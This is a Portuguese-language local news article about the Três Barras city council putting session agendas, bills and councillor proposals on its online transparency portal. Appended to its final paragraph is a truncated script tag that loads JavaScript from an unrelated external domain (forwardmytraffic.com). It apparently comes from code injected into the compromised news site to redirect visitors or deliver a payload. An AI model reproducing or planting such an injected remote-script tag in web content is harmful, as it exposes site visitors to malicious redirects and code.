InícioDestaqueCâmara de Três Barras tem dados publicados em portal de Transparência

Câmara de Três Barras tem dados publicados em portal de Transparência

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio acumulado em R$ 53 milhões

As seis dezenas do concurso 2.738 serão sorteadas, a...

Veja as vagas de empregos disponíveis em Canoinhas e região

O serviço de intermediação de vagas da Prefeitura de...

Equipe de Capoeira de Três Barras participa de competição no Paraná

Neste domingo, 16, a equipe de capoeira do Grupo...

Uma antiga demanda da comunidade tresbarrense foi atendida já neste ano de 2018. O presidente da Câmara de Vereadores de Três Barras, Ceriaval da Cruz, (DEM), solicitou que a equipe de informática disponibilizasse todo o conteúdo referente às sessões no portal de transparência do município, a fim de dar mais lisura ao processo em sua legislatura. Todo o conteúdo, inclusive, já está on-line para que os cidadãos possam acompanhar os projetos, indicações e o que será votado em cada sessão.

 

 

No portal da câmara na internet: http://camaratresbarras.sc.gov.br ; podem ser acessadas notícias, o perfil dos vereadores e o Portal de Transparência, onde estão descritas as Ordens do Dia, que é a descrição antecipada do que será votado em cada sessão, os projetos de lei e também as indicações de cada vereador.

 

 

Segundo Da Cruz, “a disponibilização dos dados também cumpre a lei de transparência e ajuda o cidadão a fiscalizar o trabalho do seu vereador”, destacou.

 

 

Sobre a “Ordem do Dia”, é importante destacar que ela é a pauta da sessão, e nela estão descritas as principais votações de projetos de lei e requerimentos que necessitam de deliberação do plenário. Ela é publicada até 24 horas antes de cada sessão e fica disponível para consulta. A única divergência que, eventualmente, poderá ser encontrada entre a Ordem publicada e a executada na sessão é quando algum dispositivo é retirado da pauta, nunca o contrário.

 

 

No campo Projetos de Lei, será possível consultar todos os projetos que tramitaram e que ainda estão sob análise da Câmara de Vereadores de Três Barras. A consulta é simples e informa em qual parte da tramitação o texto se encontra, bem como é disponibilizado o PDF, os pareceres, data de entrada e alterações.

 

 

Para ter acesso, confira o Portal da Câmara de Vereadores, e siga até o link Transparência…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.